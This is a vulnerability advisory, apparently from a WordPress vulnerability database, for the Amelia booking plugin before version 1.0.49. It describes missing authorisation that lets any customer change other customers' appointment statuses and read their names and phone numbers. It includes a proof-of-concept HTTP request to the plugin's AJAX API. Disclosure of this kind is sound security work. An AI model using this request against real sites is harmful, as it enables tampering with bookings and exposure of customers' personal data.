WordPress Plugin Vulnerabilities
Amelia < 1.0.49 - Customer+ Arbitrary Appointments Status Update
Description
The plugin does not have proper authorisation when managing appointments, allowing any customer to update other's booking status, as well as retrieve sensitive information about the bookings, such as the full name and phone number of the person who booked it.
Proof of Concept
1. Make a booking to become customer 2. Login to WordPress with the customer account and make the following request (the ameliaNonce can be retrieved via "wpAmeliaNonce" under the Amelia dashboard) POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/status/2&ameliaNonce=e9ff5220c4 HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/json;charset=utf-8 Content-Length: 711 Connection: close Cookie: [customer+ cookies] {"status": "approved","packageCustomerId": null}
Affects Plugins
References
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Huli from Cymetrics
Submitter
Huli from Cymetrics
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-14 (about 2 years ago)
Added
2022-03-14 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)